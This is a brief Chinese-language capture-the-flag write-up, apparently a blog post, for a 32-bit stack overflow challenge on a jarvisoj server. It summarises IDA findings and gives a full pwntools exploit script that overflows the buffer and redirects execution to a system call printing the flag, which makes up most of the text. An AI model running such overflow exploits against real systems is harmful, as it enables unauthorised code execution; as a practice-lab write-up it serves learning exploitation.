32位下的简单栈溢出,IDA反编译之后发现在memtest函数之中传入参数cat flag,在函数winfunc之中调用了系统函数system。
![](https://img.haomeiwen.com/i7320599/6997ce28096adcce.png)
![](https://img.haomeiwen.com/i7320599/01f99d43b8d42ff8.png)
ret2libc,直接getshell
from pwn import *
p = remote("pwn2.jarvisoj.com",9876)
callsystem = 0x080485BD
catflag = 0x080487E0
payload = 'a'*(0x13 + 4) + p32(callsystem) + p32(0x08048677) + p32(catflag)
p.sendline(payload)
p.interactive()
网友评论